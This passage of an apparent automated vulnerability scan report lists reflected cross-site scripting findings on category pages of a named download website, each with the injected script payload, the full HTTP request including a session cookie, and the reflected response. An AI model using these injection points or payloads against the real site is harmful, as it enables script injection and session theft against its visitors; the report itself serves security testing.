The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7253d"><script>alert(1)</script>294861f4a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories7253d"><script>alert(1)</script>294861f4a4e/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories7253d"><script>alert(1)</script>294861f4a4e/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html" />
...[SNIP]...

1.184. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2500"><script>alert(1)</script>7d8844f103c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.htmlb2500"><script>alert(1)</script>7d8844f103c HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.htmlb2500"><script>alert(1)</script>7d8844f103c" />
...[SNIP]...

1.185. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7af"><script>alert(1)</script>b1ff1afa51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html?3d7af"><script>alert(1)</script>b1ff1afa51b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html?3d7af"><script>alert(1)</script>b1ff1afa51b=1" />
...[SNIP]...

1.186. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25cff"><script>alert(1)</script>55fd3605a8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories25cff"><script>alert(1)</script>55fd3605a8f/free-64-bit-desktop-downloads-4-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories25cff"><script>alert(1)</script>55fd3605a8f/free-64-bit-desktop-downloads-4-0-d.html" />
...[SNIP]...

1.187. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7de5"><script>alert(1)</script>3c381f515e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.htmld7de5"><script>alert(1)</script>3c381f515e3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-desktop-downloads-4-0-d.htmld7de5"><script>alert(1)</script>3c381f515e3" />
...[SNIP]...

1.188. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3aea"><script>alert(1)</script>baafb6db136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.html?b3aea"><script>alert(1)</script>baafb6db136=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-desktop-downloads-4-0-d.html?b3aea"><script>alert(1)</script>baafb6db136=1" />
...[SNIP]...

1.189. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec4b"><script>alert(1)</script>598f0083468 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories2ec4b"><script>alert(1)</script>598f0083468/free-64-bit-development-downloads-5-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:33:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories2ec4b"><script>alert(1)</script>598f0083468/free-64-bit-development-downloads-5-0-d.html" />
...[SNIP]...

1.190. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b81e"><script>alert(1)</script>bcc56172be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html5b81e"><script>alert(1)</script>bcc56172be7 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-development-downloads-5-0-d.html5b81e"><script>alert(1)</script>bcc56172be7" />
...[SNIP]...

1.191. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7654"><script>alert(1)</script>5fed9989261 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html?d7654"><script>alert(1)</script>5fed9989261=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-development-downloads-5-0-d.html?d7654"><script>alert(1)</script>5fed9989261=1" />
...[SNIP]...

1.192. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d364"><script>alert(1)</script>136359d2933 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories1d364"><script>alert(1)</script>136359d2933/free-64-bit-education-downloads-6-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories1d364"><script>alert(1)</script>136359d2933/free-64-bit-education-downloads-6-0-d.html" />
...[SNIP]...

1.193. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8f59"><script>alert(1)</script>ff671245bd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-education-downloads-6-0-d.htmlf8f59"><script>alert(1)</script>ff671245bd6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-education-downloads-6-0-d.htmlf8f59"><script>alert(1)</script>ff671245bd6" />
...[SNIP]...

1.194. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bca"><script>alert(1)</script>6ff9196ddc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-education-downloads-6-0-d.html?b4bca"><script>alert(1)</script>6ff9196ddc8=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-education-downloads-6-0-d.html?b4bca"><script>alert(1)</script>6ff9196ddc8=1" />
...[SNIP]...

1.195. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d9ce"><script>alert(1)</script>2ed7bbf475d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories8d9ce"><script>alert(1)</script>2ed7bbf475d/free-64-bit-games-entertainment-downloads-7-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:34:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories8d9ce"><script>alert(1)</script>2ed7bbf475d/free-64-bit-games-entertainment-downloads-7-0-d.html" />
...[SNIP]...

1.196. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e40"><script>alert(1)</script>ceaef40d2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.htmle3e40"><script>alert(1)</script>ceaef40d2d6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-games-entertainment-downloads-7-0-d.htmle3e40"><script>alert(1)</script>ceaef40d2d6" />
...[SNIP]...

1.197. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a05c7"><script>alert(1)</script>0644b46147f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.html?a05c7"><script>alert(1)</script>0644b46147f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-games-entertainment-downloads-7-0-d.html?a05c7"><script>alert(1)</script>0644b46147f=1" />
...[SNIP]...

1.198. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17d7f"><script>alert(1)</script>2644ecf6c0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories17d7f"><script>alert(1)</script>2644ecf6c0e/free-64-bit-graphic-apps-downloads-8-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:35:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories17d7f"><script>alert(1)</script>2644ecf6c0e/free-64-bit-graphic-apps-downloads-8-0-d.html" />
...[SNIP]...

1.199. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a94a6"><script>alert(1)</script>4f8ac4abfac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.htmla94a6"><script>alert(1)</script>4f8ac4abfac HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
